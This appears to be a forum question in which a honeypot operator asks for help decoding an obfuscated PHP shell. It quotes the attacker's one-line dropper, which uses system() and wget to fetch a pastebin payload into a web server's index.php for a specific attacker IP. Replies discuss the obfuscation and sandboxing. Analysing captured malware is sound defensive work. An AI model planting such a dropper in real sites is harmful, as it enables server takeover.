# Deobfuscate this PHP shell attack

Tags: php, shell, base64

One of my honeypot systems has a pretty interesting PHP shell on it, i've been trying to decode it, but I'm not having any luck getting the contense of the gzinflated b64 encoded part of the script.

Maybe someone with a little more experience with deobfuscating could take a look at it?

Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S

```
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {@system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
```

I attempted to deobfucsate it myself by printing variables in different places, but i can't for the life of me get the contents to print out.

Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ

Comment: To make sense of the code, you need to know the value of l__l_ that the person is using. With that, l___l_ and l__l_ are used to produce a new value for l__l_ that is the gzdeflated string used to create a function.

Comment: No. And not just because I don't feel like doing your work for you, although that's a big part. I've done this before, and it always winds up either being a remote shell, or a script to include code from somewhere else that either tries to DDoS or send spam.

Comment: kainaw, I've tried printing all of those out and they all print empty. Sammitch, that's why you should always use a sandbox to run php code like this. Never ever run code like this on a system of importance! If someone would like to help with this, please let me know.

Comment: Gimme a second, i'll run it on production ;)